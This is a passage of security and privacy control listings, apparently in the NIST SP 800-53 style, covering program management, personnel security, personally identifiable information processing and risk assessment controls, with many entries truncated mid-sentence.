PL-11 Baseline Tailoring Tailor the selected control baseline by applying specified tailoring actions. The concept of tailoring allows organizations to specialize or customize a set of baseline controls by PL-10, RA-2, RA-3, RA-9, SA-8.
PM-1 Information Security Program Plan a. Develop and disseminate an organization-wide information security program plan that: 1. Provides an overview of the requirements for the security program and a description of the security program management controls and common controls in place or planned for meeting those requirements; An information security program plan is a formal document that provides an overview of the security requirements for an organization-wide information security program and describes the program management controls and common controls in place or planned for meeting those requirements. An information security program plan can be represented in a single document or PL-2, PM-18, PM-30, RA-9, SI-12, SR-2.
PM-2 Information Security Program Leadership Role Appoint a senior agency information security officer with the mission and resources to coordinate, develop, implement, and maintain an organization-wide information security program. The senior agency information security officer is an organizational official. For federal agencies (as defined by applicable laws, executive orders, regulations, directives, policies, and standards), this official is the senior agency information security officer. Organizations may also refer to this official as the senior information security officer or chief information security officer. None.
PM-3 Information Security and Privacy Resources a. Include the resources needed to implement the information security and privacy programs in capital planning and investment requests and document all exceptions to this requirement; Organizations consider establishing champions for information security and privacy and, as part of PM-4, SA-2.
PM-4 Plan of Action and Milestones Process a. Implement a process to ensure that plans of action and milestones for the information security, privacy, and supply chain risk management programs and associated organizational systems: The plan of action and milestones is a key organizational document and is subject to reporting requi CA-5, CA-7, PM-3, RA-7, SI-12.
PM-5 System Inventory Develop and update [Assignment: organization-defined frequency] an inventory of organizational systems. OMB A-130 provides guidance on developing systems inventories and associated reporting requirements. System inventory refers to an organization-wide inventory of systems, not system components as described in CM-8. None.
PM-5(1) System Inventory | Inventory of Personally Identifiable Information Establish, maintain, and update [Assignment: organization-defined frequency] an inventory of all syst An inventory of systems, applications, and projects that process personally identifiable information s AC-3, CM-8, CM-12, CM-13, PL-8, PM-22, PT-3, PT-5, SI-12, SI-18.
PM-6 Measures of Performance Develop, monitor, and report on the results of information security and privacy measures of perform Measures of performance are outcome-based metrics used by an organization to measure the effectiven CA-7, PM-9.
PM-7 Enterprise Architecture Develop and maintain an enterprise architecture with consideration for information security, privacy, The integration of security and privacy requirements and controls into the enterprise architecture he AU-6, PL-2, PL-8, PM-11, RA-2, SA-3, SA-8, SA-17.
PM-7(1) Enterprise Architecture | Offloading Offload [Assignment: organization-defined non-essential functions or services] to other systems, sys Not every function or service that a system provides is essential to organizational mission or busines SA-8.
PM-8 Critical Infrastructure Plan Address information security and privacy issues in the development, documentation, and updating of a Protection strategies are based on the prioritization of critical assets and resources. The requirement CP-2, CP-4, PE-18, PL-2, PM-9, PM-11, PM-18, RA-3, SI-12.
PM-9 Risk Management Strategy a. Develops a comprehensive strategy to manage: 1. Security risk to organizational operations and assets, individuals, other organizations, and the Nation associated with the operation and use of organizational systems; and An organization-wide risk management strategy includes an expression of the security and privacy risk AC-1, AU-1, AT-1, CA-1, CA-2, CA-5, CA-6, CA-7, CM-1, CP-1, IA-1, IR-1, MA-1, MP-1, PE-1, PL-1, PL-2, PM-2, PM-8, PM-18, PM-28, PM-30, PS-1, PT-1, PT-2, PT-3, RA-1, RA-3, RA-9, SA-1, SA-4, SC-1, SC-38, SI-1, SI-12, SR-1, SR-2.
PM-10 Authorization Process a. Manage the security and privacy state of organizational systems and the environments in which those systems operate through authorization processes; Authorization processes for organizational systems and environments of operation require the impleme CA-6, CA-7, PL-2.
PM-11 Mission and Business Process Definition a. Define organizational mission and business processes with consideration for information security and privacy and the resulting risk to organizational operations, organizational assets, individuals, other organizations, and the Nation; and Protection needs are technology-independent capabilities that are required to counter threats to orga CP-2, PL-2, PM-7, PM-8, RA-2, RA-3, RA-9, SA-2.
PM-12 Insider Threat Program Implement an insider threat program that includes a cross-discipline insider threat incident handling Organizations that handle classified information are required, under Executive Order 13587 EO 13587 and the National Insider Threat Policy ODNI NITP, to establish insider threat programs. The same standards and guidelines that apply to insider threat programs in classified environments can also be employed effectively to improve the security of controlled unclassified and other AC-6, AT-2, AU-6, AU-7, AU-10, AU-12, AU-13, CA-7, IA-4, IR-4, MP-7, PE-2, PM-16, PS-3, PS-4, PS-5, PS-7, PS-8, SC-7, SC-38, SI-4, PM-14.
PM-13 Security and Privacy Workforce Establish a security and privacy workforce development and improvement program. Security and privacy workforce development and improvement programs include defining the knowledge, AT-2, AT-3.
PM-14 Testing, Training, and Monitoring a. Implement a process for ensuring that organizational plans for conducting security and privacy testing, training, and monitoring activities associated with organizational systems: A process for organization-wide security and privacy testing, training, and monitoring helps ensure t AT-2, AT-3, CA-7, CP-4, IR-3, PM-12, SI-4.
PM-15 Security and Privacy Groups and Associations Establish and institutionalize contact with selected groups and associations within the security and privacy communities: Ongoing contact with security and privacy groups and associations is important in an environment of ra SA-11, SI-5.
PM-16 Threat Awareness Program Implement a threat awareness program that includes a cross-organization information-sharing capabili Because of the constantly changing and increasing sophistication of adversaries, especially the advanc IR-4, PM-12.
PM-16(1) Threat Awareness Program | Automated Means for Sharing Threat Intelligence Employ automated mechanisms to maximize the effectiveness of sharing threat intelligence information. To maximize the effectiveness of monitoring, it is important to know what threat observables and indicators the sensors need to be searching for. By using well-established frameworks, services, and automated tools, organizations improve their ability to rapidly share and feed the relevant threat detection signatures into monitoring tools. None.
PM-17 Protecting Controlled Unclassified Information on External Systems a. Establish policy and procedures to ensure that requirements for the protection of controlled unclassified information that is processed, stored or transmitted on external systems, are implemented in accordance with applicable laws, executive orders, directives, policies, regulations, and standards; and Controlled unclassified information is defined by the National Archives and Records Administration al CA-6, PM-10.
PM-18 Privacy Program Plan a. Develop and disseminate an organization-wide privacy program plan that provides an overview of the agency’s privacy program, and: A privacy program plan is a formal document that provides an overview of an organization’s privacy program, including a description of the structure of the privacy program, the resources dedicated to the privacy program, the role of the senior agency official for privacy and other privacy officials and staff, the strategic goals and objectives of the privacy program, and the program management PM-8, PM-9, PM-19.
PM-19 Privacy Program Leadership Role Appoint a senior agency official for privacy with the authority, mission, accountability, and resour The privacy officer is an organizational official. For federal agencies—as defined by applicable laws, e PM-18, PM-20, PM-23, PM-24, PM-27.
PM-20 Dissemination of Privacy Program Information Maintain a central resource webpage on the organization’s principal public website that serves as a central source of information about the organization’s privacy program and that: For federal agencies, the webpage is located at www.[agency].gov/privacy. Federal agencies include AC-3, PM-19, PT-5, PT-6, PT-7, RA-8.
PM-20(1) Dissemination of Privacy Program Information | Privacy Policies on Websites, Applications, and Digital Services Develop and post privacy policies on all external-facing websites, mobile applications, and other digital services, that: Organizations post privacy policies on all external-facing websites, mobile applications, and other digital services. Organizations post a link to the relevant privacy policy on any known, major entry points to the website, application, or digital service. In addition, organizations provide a link to the privacy policy on any webpage that collects personally identifiable information. Organizations may None.
PM-21 Accounting of Disclosures a. Develop and maintain an accurate accounting of disclosures of personally identifiable information, including: The purpose of accounting of disclosures is to allow individuals to learn to whom their personally identifiable information has been disclosed, to provide a basis for subsequently advising recipients of any corrected or disputed personally identifiable information, and to provide an audit trail for subsequent reviews of organizational compliance with conditions for disclosures. For federal AC-3, AU-2, PT-2.
PM-22 Personally Identifiable Information Quality Management Develop and document organization-wide policies and procedures for: a. Reviewing for the accuracy, relevance, timeliness, and completeness of personally identifiable information across the information life cycle; Personally identifiable information quality management includes steps that organizations take to confirm the accuracy and relevance of personally identifiable information throughout the information life cycle. The information life cycle includes the creation, collection, use, processing, storage, maintenance, dissemination, disclosure, and disposition of personally identifiable PM-23, SI-18.
PM-23 Data Governance Body Establish a Data Governance Body consisting of [Assignment: organization-defined roles] with [Assign A Data Governance Body can help ensure that the organization has coherent policies and the ability to AT-2, AT-3, PM-19, PM-22, PM-24, PT-7, SI-4, SI-19.
PM-24 Data Integrity Board Establish a Data Integrity Board to: a. Review proposals to conduct or participate in a matching program; and A Data Integrity Board is the board of senior officials designated by the head of a federal agency a AC-4, PM-19, PM-23, PT-2, PT-8.
PM-25 Minimization of Personally Identifiable Information Used in Testing, Training, and Research a. Develop, document, and implement policies and procedures that address the use of personally identifiable information for internal testing, training, and research; The use of personally identifiable information in testing, research, and training increases the risk of PM-23, PT-3, SA-3, SA-8, SI-12.
PM-26 Complaint Management Implement a process for receiving and responding to complaints, concerns, or questions from individuals about the organizational security and privacy practices that includes: Complaints, concerns, and questions from individuals can serve as valuable sources of input to organi IR-7, IR-9, PM-22, SI-18.
PM-27 Privacy Reporting a. Develop [Assignment: organization-defined privacy reports] and disseminate to: 1. [Assignment: organization-defined oversight bodies] to demonstrate accountability with statutory, regulatory, and policy privacy mandates; and Through internal and external reporting, organizations promote accountability and transparency in org IR-9, PM-19.
PM-28 Risk Framing a. Identify and document: 1. Assumptions affecting risk assessments, risk responses, and risk monitoring; Risk framing is most effective when conducted at the organization level and in consultation with stake CA-7, PM-9, RA-3, RA-7.
PM-29 Risk Management Program Leadership Roles a. Appoint a Senior Accountable Official for Risk Management to align organizational information security and privacy management processes with strategic, operational, and budgetary planning processes; and The senior accountable official for risk management leads the risk executive (function) in organizatio PM-2, PM-19.
PM-30 Supply Chain Risk Management Strategy a. Develop an organization-wide strategy for managing supply chain risks associated with the development, acquisition, maintenance, and disposal of systems, system components, and system services; An organization-wide supply chain risk management strategy includes an unambiguous expression of the CM-10, PM-9, SR-1, SR-2, SR-3, SR-4, SR-5, SR-6, SR-7, SR-8, SR-9, SR-11.
PM-30(1) Supply Chain Risk Management Strategy | Suppliers of Critical or Mission-essential Items Identify, prioritize, and assess suppliers of critical or mission-essential technologies, products, and ser The identification and prioritization of suppliers of critical or mission-essential technologies, prod RA-3, SR-6.
PM-31 Continuous Monitoring Strategy Develop an organization-wide continuous monitoring strategy and implement continuous monitoring programs that include: Continuous monitoring at the organization level facilitates ongoing awareness of the security and pr AC-2, AC-6, AC-17, AT-4, AU-6, AU-13, CA-2, CA-5, CA-6, CA-7, CM-3, CM-4, CM-6, CM-11, IA-5, IR-5, MA-2, MA-3, MA-4, PE-3, PE-6, PE-14, PE-16, PE-20, PL-2, PM-4, PM-6, PM-9, PM-10, PM-12, PM-14, PM-23, PM-28, PS-7, PT-7, RA-3, RA-5, RA-7, SA-9, SA-11, SC-5, SC-7, SC-18, SC-38, SC-43, SI-3, SI-4, SI-12, SR-2, SR-4.
PM-32 Purposing Analyze [Assignment: organization-defined systems or systems components] supporting mission essenti Systems are designed to support a specific mission or business function. However, over time, systems CA-7, PL-2, RA-3, RA-9.
PS-1 Policy and Procedures a. Develop, document, and disseminate to [Assignment: organization-defined personnel or roles]: 1. [Selection (one or more): Organization-level; Mission/business process-level; System-level] personnel security policy that: Personnel security policy and procedures for the controls in the PS family that are implemented withi PM-9, PS-8, SI-12.
PS-2 Position Risk Designation a. Assign a risk designation to all organizational positions; b. Establish screening criteria for individuals filling those positions; and Position risk designations reflect Office of Personnel Management (OPM) policy and guidance. Proper po AC-5, AT-3, PE-2, PE-3, PL-2, PS-3, PS-6, SA-5, SA-21, SI-12.
PS-3 Personnel Screening a. Screen individuals prior to authorizing access to the system; and b. Rescreen individuals in accordance with [Assignment: organization-defined conditions requiring rescreening and, where rescreening is so indicated, the frequency of rescreening]. Personnel screening and rescreening activities reflect applicable laws, executive orders, directives, AC-2, IA-4, MA-5, PE-2, PM-12, PS-2, PS-6, PS-7, SA-21.
PS-3(1) Personnel Screening | Classified Information Verify that individuals accessing a system processing, storing, or transmitting classified information Classified information is the most sensitive information that the Federal Government processes, stores AC-3, AC-4.
PS-3(2) Personnel Screening | Formal Indoctrination Verify that individuals accessing a system processing, storing, or transmitting types of classified inf Types of classified information that require formal indoctrination include Special Access Program (S AC-3, AC-4.
PS-3(3) Personnel Screening | Information Requiring Special Protective Measures Verify that individuals accessing a system processing, storing, or transmitting information requiring special protection: Organizational information that requires special protection includes controlled unclassified information. Personnel security criteria include position sensitivity background screening requirements. None.
PS-3(4) Personnel Screening | Citizenship Requirements Verify that individuals accessing a system processing, storing, or transmitting [Assignment: organization-defined information types] meet [Assignment: organization-defined citizenship requirements]. None. None.
PS-4 Personnel Termination Upon termination of individual employment: a. Disable system access within [Assignment: organization-defined time period]; System property includes hardware authentication tokens, system administration technical manuals, keys AC-2, IA-4, PE-2, PM-12, PS-6, PS-7.
PS-4(1) Personnel Termination | Post-employment Requirements (a) Notify terminated individuals of applicable, legally binding post-employment requirements for the protection of organizational information; and Organizations consult with the Office of the General Counsel regarding matters of post-employment requirements on terminated individuals. None.
PS-4(2) Personnel Termination | Automated Actions Use [Assignment: organization-defined automated mechanisms] to [Selection (one or more): notify [Assignment: organization-defined personnel or roles] of individual termination actions; disable access to system resources]. In organizations with many employees, not all personnel who need to know about termination actions receive the appropriate notifications, or if such notifications are received, they may not occur in a timely manner. Automated mechanisms can be used to send automatic alerts or notifications to organizational personnel or roles when individuals are terminated. Such automatic None.
PS-5 Personnel Transfer a. Review and confirm ongoing operational need for current logical and physical access authorizations to systems and facilities when individuals are reassigned or transferred to other positions within the organization; Personnel transfer applies when reassignments or transfers of individuals are permanent or of such ex AC-2, IA-4, PE-2, PM-12, PS-4, PS-7.
PS-6 Access Agreements a. Develop and document access agreements for organizational systems; b. Review and update the access agreements [Assignment: organization-defined frequency]; and Access agreements include nondisclosure agreements, acceptable use agreements, rules of behavior, a AC-17, PE-2, PL-4, PS-2, PS-3, PS-6, PS-7, PS-8, SA-21, SI-12.
PS-6(1) Access Agreements | Information Requiring Special Protection [Withdrawn: Incorporated into PS-3.]
PS-6(2) Access Agreements | Classified Information Requiring Special Protection Verify that access to classified information requiring special protection is granted only to individuals who: Classified information that requires special protection includes collateral information, Special Access Program (SAP) information, and Sensitive Compartmented Information (SCI). Personnel security criteria reflect applicable laws, executive orders, directives, regulations, policies, standards, and guidelines. None.
PS-6(3) Access Agreements | Post-employment Requirements (a) Notify individuals of applicable, legally binding post-employ­ment requirements for protection of organizational information; and Organizations consult with the Office of the General Counsel regarding matters of post-employment PS-4.
PS-7 External Personnel Security a. Establish personnel security requirements, including security roles and responsibilities for external providers; External provider refers to organizations other than the organization operating or acquiring the syst AT-2, AT-3, MA-5, PE-3, PS-2, PS-3, PS-4, PS-5, PS-6, SA-5, SA-9, SA-21.
PS-8 Personnel Sanctions a. Employ a formal sanctions process for individuals failing to comply with established information security and privacy policies and procedures; and Organizational sanctions reflect applicable laws, executive orders, directives, regulations, policies, PL-4, PM-12, PS-6, PT-1.
PS-9 Position Descriptions Incorporate security and privacy roles and responsibilities into organizational position descriptions. Specification of security and privacy roles in individual organizational position descriptions facilitates clarity in understanding the security and privacy responsibilities associated with the roles and the role-based security and privacy training requirements for the roles. None.
PT-1 Policy and Procedures a. Develop, document, and disseminate to [Assignment: organization-defined personnel or roles]: 1. [Selection (one or more): Organization-level; Mission/business process-level; System-level] personally identifiable information processing and transparency policy that: Personally identifiable information processing or transparency policy and procedures address the controls in the PT family that are implemented within systems and organizations. The risk management strategy is an important factor in establishing such policies and procedures. Policies and procedures contribute to security and privacy assurance. Therefore, it is important that security
PT-2 Authority to Process Personally Identifiable Information a. Determine and document the [Assignment: organization-defined authority] that permits the [Assignment: organization-defined processing] of personally identifiable information; The processing of personally identifiable information is an operation or set of operations that the information system or organization performs with respect to personally identifiable information across the information life cycle. Processing includes but is not limited to creation, collection, use, processing, storage, maintenance, dissemination, disclosure, and disposal. Processing operations AC-2, AC-3, CM-13, IR-9, PM-9, PM-24, PT-1, PT-3, PT-5, PT-6, RA-3, RA-8, SI-12, SI-18.
PT-2(1) Authority to Process Personally Identifiable Information | Data Tagging Attach data tags containing [Assignment: organization-defined authorized processing] to [Assignment: Data tags support the tracking and enforcement of authorized processing by conveying the types of p AC-16, CA-6, CM-12, PM-5, PM-22, PT-4, SC-16, SC-43, SI-10, SI-15, SI-19.
PT-2(2) Authority to Process Personally Identifiable Information | Automation Manage enforcement of the authorized processing of personally identifiable information using [As Automated mechanisms augment verification that only authorized processing is occurring. CA-6, CM-12, PM-5, PM-22, PT-4, SC-16, SC-43, SI-10, SI-15, SI-19.
PT-3 Personally Identifiable Information Processing Purposes a. Identify and document the [Assignment: organization-defined purpose(s)] for processing personally identifiable information; Identifying and documenting the purpose for processing provides organizations with a basis for understanding why personally identifiable information may be processed. The term process includes every step of the information life cycle, including creation, collection, use, processing, storage, maintenance, dissemination, disclosure, and disposal. Identifying and documenting the AC-2, AC-3, AT-3, CM-13, IR-9, PM-9, PM-25, PT-2, PT-5, PT-6, PT-7, RA-8, SC-43, SI-12, SI-18.
PT-3(1) Personally Identifiable Information Processing Purposes | Data Tagging Attach data tags containing the following purposes to [Assignment: organization-defined elements of Data tags support the tracking of processing purposes by conveying the purposes along with the rele CA-6, CM-12, PM-5, PM-22, SC-16, SC-43, SI-10, SI-15, SI-19.
PT-3(2) Personally Identifiable Information Processing Purposes | Automation Track processing purposes of personally identifiable information using [Assignment: organization- Automated mechanisms augment tracking of the processing purposes. CA-6, CM-12, PM-5, PM-22, SC-16, SC-43, SI-10, SI-15, SI-19.
PT-4 Consent Implement [Assignment: organization-defined tools or mechanisms] for individuals to consent to the pro Consent allows individuals to participate in making decisions about the processing of their informati AC-16, PT-2, PT-5.
PT-4(1) Consent | Tailored Consent Provide [Assignment: organization-defined mechanisms] to allow individuals to tailor processing permi While some processing may be necessary for the basic functionality of the product or service, other p PT-2.
PT-4(2) Consent | Just-in-time Consent Present [Assignment: organization-defined consent mechanisms] to individuals at [Assignment: organi Just-in-time consent enables individuals to participate in how their personally identifiable informati PT-2.
PT-4(3) Consent | Revocation Implement [Assignment: organization-defined tools or mechanisms] for individuals to revoke consent t Revocation of consent enables individuals to exercise control over their initial consent decision when PT-2.
PT-5 Privacy Notice
Control Text: Provide notice to individuals about the processing of personally identifiable information that: a. Is available to individuals upon first interacting with an organization, and subsequently at [Assignment: organization-defined frequency];
Discussion: Privacy notices help inform individuals about how their personally identifiable information is being processed by the system or organization. Organizations use privacy notices to inform individuals about how, under what authority, and for what purpose their personally identifiable information is processed, as well as other information such as choices individuals might have with respect to that
Related Controls: PM-20, PM-22, PT-2, PT-3, PT-4, PT-7, RA-3, SC-42, SI-18.

PT-5(1) Privacy Notice | Just-in-time Notice
Control Text: Present notice of personally identifiable information processing to individuals at a time and location
Discussion: Just-in-time notices inform individuals of how organizations process their personally identifiable inf
Related Controls: PM-21.

PT-5(2) Privacy Notice | Privacy Act Statements
Control Text: Include Privacy Act statements on forms that collect information that will be maintained in a Privacy
Discussion: If a federal agency asks individuals to supply information that will become part of a system of records, the agency is required to provide a PRIVACT statement on the form used to collect the information or on a separate form that can be retained by the individual. The agency provides a PRIVACT statement in such circumstances regardless of whether the information will be collected
Related Controls: PT-6.

PT-6 System of Records Notice
Control Text: For systems that process information that will be maintained in a Privacy Act system of records: a. Draft system of records notices in accordance with OMB guidance and submit new and significantly modified system of records notices to the OMB and appropriate congressional committees for advance review;
Discussion: The PRIVACT requires that federal agencies publish a system of records notice in the Federal Registe
Related Controls: AC-3, PM-20, PT-2, PT-3, PT-5.

PT-6(1) System of Records Notice | Routine Uses
Control Text: Review all routine uses published in the system of records notice at [Assignment: organization-defined frequency] to ensure continued accuracy, and to ensure that routine uses continue to be compatible with the purpose for which the information was collected.
Discussion: A PRIVACT routine use is a particular kind of disclosure of a record outside of the federal agency maintaining the system of records. A routine use is an exception to the PRIVACT prohibition on the disclosure of a record in a system of records without the prior written consent of the individual to whom the record pertains. To qualify as a routine use, the disclosure must be for a purpose that is
Related Controls: None.

PT-6(2) System of Records Notice | Exemption Rules
Control Text: Review all Privacy Act exemptions claimed for the system of records at [Assignment: organization-defined frequency] to ensure they remain appropriate and necessary in accordance with law, that they have been promulgated as regulations, and that they are accurately described in the system of records notice.
Discussion: The PRIVACT includes two sets of provisions that allow federal agencies to claim exemptions from certain requirements in the statute. In certain circumstances, these provisions allow agencies to promulgate regulations to exempt a system of records from select provisions of the PRIVACT. At a minimum, organizations' PRIVACT exemption regulations include the specific name(s) of any
Related Controls: None.

PT-7 Specific Categories of Personally Identifiable Information
Control Text: Apply [Assignment: organization-defined processing conditions] for specific categories of personally i
Discussion: Organizations apply any conditions or protections that may be necessary for specific categories of pers
Related Controls: IR-9, PT-2, PT-3, RA-3.

PT-7(1) Specific Categories of Personally Identifiable Information | Social Security Numbers
Control Text: When a system processes Social Security numbers: (a) Eliminate unnecessary collection, maintenance, and use of Social Security numbers, and explore alternatives to their use as a personal identifier;
Discussion: Federal law and policy establish specific requirements for organizations' processing of Social Securi
Related Controls: IA-4.

PT-7(2) Specific Categories of Personally Identifiable Information | First Amendment Information
Control Text: Prohibit the processing of information describing how any individual exercises rights guaranteed by the First Amendment unless expressly authorized by statute or by the individual or unless pertinent to and within the scope of an authorized law enforcement activity.
Discussion: The PRIVACT limits agencies' ability to process information that describes how individuals exercise rights guaranteed by the First Amendment. Organizations consult with the senior agency official for privacy and legal counsel regarding these requirements.
Related Controls: None.

PT-8 Computer Matching Requirements
Control Text: When a system or organization processes information for the purpose of conducting a matching program:
Discussion: The PRIVACT establishes requirements for federal and non-federal agencies if they engage in a match
Related Controls: PM-24.

RA-1 Policy and Procedures
Control Text: a. Develop, document, and disseminate to [Assignment: organization-defined personnel or roles]: 1. [Selection (one or more): Organization-level; Mission/business process-level; System-level] risk assessment policy that:
Discussion: Risk assessment policy and procedures address the controls in the RA family that are implemented with
Related Controls: PM-9, PS-8, SI-12.

RA-2 Security Categorization
Control Text: a. Categorize the system and information it processes, stores, and transmits; b. Document the security categorization results, including supporting rationale, in the security plan for the system; and
Discussion: Security categories describe the potential adverse impacts or negative consequences to organizational operations, organizational assets, and individuals if organizational information and systems are compromised through a loss of confidentiality, integrity, or availability. Security categorization is also a type of asset loss characterization in systems security engineering processes
Related Controls: CM-8, MP-4, PL-2, PL-10, PL-11, PM-7, RA-3, RA-5, RA-7, RA-8, SA-8, SC-7, SC-38, SI-12.

RA-2(1) Security Categorization | Impact-level Prioritization
Control Text: Conduct an impact-level prioritization of organizational systems to obtain additional granularity on system impact levels.
Discussion: Organizations apply the high-water mark concept to each system categorized in accordance with FIPS 199, resulting in systems designated as low impact, moderate impact, or high impact. Organizations that desire additional granularity in the system impact designations for risk-based decision-making can further partition the systems into sub-categories of the initial system
Related Controls: None.

RA-3 Risk Assessment
Control Text: a. Conduct a risk assessment, including: 1. Identifying threats to and vulnerabilities in the system;
Discussion: Risk assessments consider threats, vulnerabilities, likelihood, and impact to organizational operations and assets, individuals, other organizations, and the Nation. Risk assessments also consider risk from external parties, including contractors who operate systems on behalf of the organization, individuals who access organizational systems, service providers, and outsourcing
Related Controls: CA-3, CA-6, CM-4, CM-13, CP-6, CP-7, IA-8, MA-5, PE-3, PE-8, PE-18, PL-2, PL-10, PL-11, PM-8, PM-9, PM-17, PM-28, PM-30, PT-2, PT-7, RA-2, RA-5, RA-7, SA-8, SA-9, SC-38, SI-12.

RA-3(1) Risk Assessment | Supply Chain Risk Assessment
Control Text: (a) Assess supply chain risks associated with [Assignment: organization-defined systems, system components, and system services]; and
Discussion: Supply chain-related events include disruption, use of defective components, insertion of counterfeits,
Related Controls: RA-2, RA-9, SR-2.

RA-3(2) Risk Assessment | Use of All-source Intelligence
Control Text: Use all-source intelligence to assist in the analysis of risk.
Discussion: Organizations employ all-source intelligence to inform engineering, acquisition, and risk management decisions. All-source intelligence consists of information derived from all available sources, including publicly available or open-source information, measurement and signature intelligence, human intelligence, signals intelligence, and imagery intelligence. All-source
Related Controls: None.

RA-3(3) Risk Assessment | Dynamic Threat Awareness
Control Text: Determine the current cyber threat environment on an ongoing basis using [Assignment: organizatio
Discussion: The threat awareness information that is gathered feeds into the organization's information security
Related Controls: AT-2.

RA-3(4) Risk Assessment | Predictive Cyber Analytics
Control Text: Employ the following advanced automation and analytics capabilities to predict and identify risks to [Assignment: organization-defined systems or system components]: [Assignment: organization-defined advanced automation and analytics capabilities].
Discussion: A properly resourced Security Operations Center (SOC) or Computer Incident Response Team (CIRT) may be overwhelmed by the volume of information generated by the proliferation of security tools and appliances unless it employs advanced automation and analytics to analyze the data. Advanced automation and analytics capabilities are typically supported by artificial intelligence concepts,
Related Controls: None.

RA-4 Risk Assessment Update [Withdrawn: Incorporated into RA-3.]

RA-5 Vulnerability Monitoring and Scanning
Control Text: a. Monitor and scan for vulnerabilities in the system and hosted applications [Assignment: organization-defined frequency and/or randomly in accordance with organization-defined process] and when new vulnerabilities potentially affecting the system are identified and reported;
Discussion: Security categorization of information and systems guides the frequency and comprehensiveness of vulnerability monitoring (including scans). Organizations determine the required vulnerability monitoring for system components, ensuring that the potential sources of vulnerabilities—such as infrastructure components (e.g., switches, routers, guards, sensors), networked printers, scanners,
Related Controls: CA-2, CA-7, CA-8, CM-2, CM-4, CM-6, CM-8, RA-2, RA-3, SA-11, SA-15, SC-38, SI-2, SI-3, SI-4, SI-7, SR-11.

RA-5(1) Vulnerability Monitoring and Scanning | Update Tool Capability [Withdrawn: Incorporated into RA-5.]

RA-5(2) Vulnerability Monitoring and Scanning | Update Vulnerabilities to Be Scanned
Control Text: Update the system vulnerabilities to be scanned [Selection (one or more): [Assignment: organization-
Discussion: Due to the complexity of modern software, systems, and other factors, new vulnerabilities are discovere
Related Controls: SI-5.

RA-5(3) Vulnerability Monitoring and Scanning | Breadth and Depth of Coverage
Control Text: Define the breadth and depth of vulnerability scanning coverage.
Discussion: The breadth of vulnerability scanning coverage can be expressed as a percentage of components within the system, by the particular types of systems, by the criticality of systems, or by the number of vulnerabilities to be checked. Conversely, the depth of vulnerability scanning coverage can be expressed as the level of the system design that the organization intends to monitor (e.g.,
Related Controls: None.

RA-5(4) Vulnerability Monitoring and Scanning | Discoverable Information
Control Text: Determine information about the system that is discoverable and take [Assignment: organization-defi
Discussion: Discoverable information includes information that adversaries could obtain without compromising
Related Controls: AU-13, SC-26.

RA-5(5) Vulnerability Monitoring and Scanning | Privileged Access
Control Text: Implement privileged access authorization to [Assignment: organization-defined system components] for [Assignment: organization-defined vulnerability scanning activities].
Discussion: In certain situations, the nature of the vulnerability scanning may be more intrusive, or the system component that is the subject of the scanning may contain classified or controlled unclassified information, such as personally identifiable information. Privileged access authorization to selected system components facilitates more thorough vulnerability scanning and protects the sensitive
Related Controls: None.

RA-5(6) Vulnerability Monitoring and Scanning | Automated Trend Analyses
Control Text: Compare the results of multiple vulnerability scans using [Assignment: organization-defined automated mechanisms].
Discussion: Using automated mechanisms to analyze multiple vulnerability scans over time can help determine trends in system vulnerabilities and identify patterns of attack.
Related Controls: None.

RA-5(7) Vulnerability Monitoring and Scanning | Automated Detection and Notification of Unauthorized Components [Withdrawn: Incorporated into CM-8.]

RA-5(8) Vulnerability Monitoring and Scanning | Review Historic Audit Logs
Control Text: Review historic audit logs to determine if a vulnerability identified in a [Assignment: organization-d
Discussion: Reviewing historic audit logs to determine if a recently detected vulnerability in a system has been pr
Related Controls: AU-6, AU-11.

RA-5(9) Vulnerability Monitoring and Scanning | Penetration Testing and Analyses [Withdrawn: Incorporated into CA-8.]

RA-5(10) Vulnerability Monitoring and Scanning | Correlate Scanning Information
Control Text: Correlate the output from vulnerability scanning tools to determine the presence of multi-vulnerability and multi-hop attack vectors.
Discussion: An attack vector is a path or means by which an adversary can gain access to a system in order to deliver malicious code or exfiltrate information. Organizations can use attack trees to show how hostile activities by adversaries interact and combine to produce adverse impacts or negative consequences to systems and organizations. Such information, together with correlated data from
Related Controls: None.

RA-5(11) Vulnerability Monitoring and Scanning | Public Disclosure Program
Control Text: Establish a public reporting channel for receiving reports of vulnerabilities in organizational systems and system components.
Discussion: The reporting channel is publicly discoverable and contains clear language authorizing good-faith research and the disclosure of vulnerabilities to the organization. The organization does not condition its authorization on an expectation of indefinite non-disclosure to the public by the reporting entity but may request a specific time period to properly remediate the vulnerability.
Related Controls: None.

RA-6 Technical Surveillance Countermeasures Survey
Control Text: Employ a technical surveillance countermeasures survey at [Assignment: organization-defined locations] [Selection (one or more): [Assignment: organization-defined frequency]; when the following events or indicators occur: [Assignment: organization-defined events or indicators]].
Discussion: A technical surveillance countermeasures survey is a service provided by qualified personnel to detect the presence of technical surveillance devices and hazards and to identify technical security weaknesses that could be used in the conduct of a technical penetration of the surveyed facility. Technical surveillance countermeasures surveys also provide evaluations of the technical security
Related Controls: None.

RA-7 Risk Response
Control Text: Respond to findings from security and privacy assessments, monitoring, and audits in accordance with
Discussion: Organizations have many options for responding to risk including mitigating risk by implementing new c
Related Controls: CA-5, IR-9, PM-4, PM-28, RA-2, RA-3, SR-2.

RA-8 Privacy Impact Assessments
Control Text: Conduct privacy impact assessments for systems, programs, or other activities before: a. Developing or procuring information technology that processes personally identifiable information; and
Discussion: A privacy impact assessment is an analysis of how personally identifiable information is handled to ensure that handling conforms to applicable privacy requirements, determine the privacy risks associated with an information system or activity, and evaluate ways to mitigate privacy risks. A privacy impact assessment is both an analysis and a formal document that details the process and
Related Controls: CM-4, CM-9, CM-13, PT-2, PT-3, PT-5, RA-1, RA-2, RA-3, RA-7.

RA-9 Criticality Analysis
Control Text: Identify critical system components and functions by performing a criticality analysis for [Assignmen
Discussion: Not all system components, functions, or services necessarily require significant protections. For example, criticality analysis is a key tenet of supply chain risk management and informs the prioritization of protection activities. The identification of critical system components and functions considers applicable laws, executive orders, regulations, directives, policies, standards, system
Related Controls: CP-2, PL-2, PL-8, PL-11, PM-1, PM-11, RA-2, SA-8, SA-15, SA-20, SR-5.

RA-10 Threat Hunting
Control Text: a. Establish and maintain a cyber threat hunting capability to: 1. Search for indicators of compromise in organizational systems; and
Discussion: Threat hunting is an active means of cyber defense in contrast to traditional protection measures, s
Related Controls: CA-2, CA-7, CA-8, RA-3, RA-5, RA-6, SI-4.

SA-1 Policy and Procedures
Control Text: a. Develop, document, and disseminate to [Assignment: organization-defined personnel or roles]: 1. [Selection (one or more): Organization-level; Mission/business process-level; System-level] system and services acquisition policy that:
Discussion: System and services acquisition policy and procedures address the controls in the SA family that are
Related Controls: PM-9, PS-8, SA-8, SI-12.

SA-2 Allocation of Resources
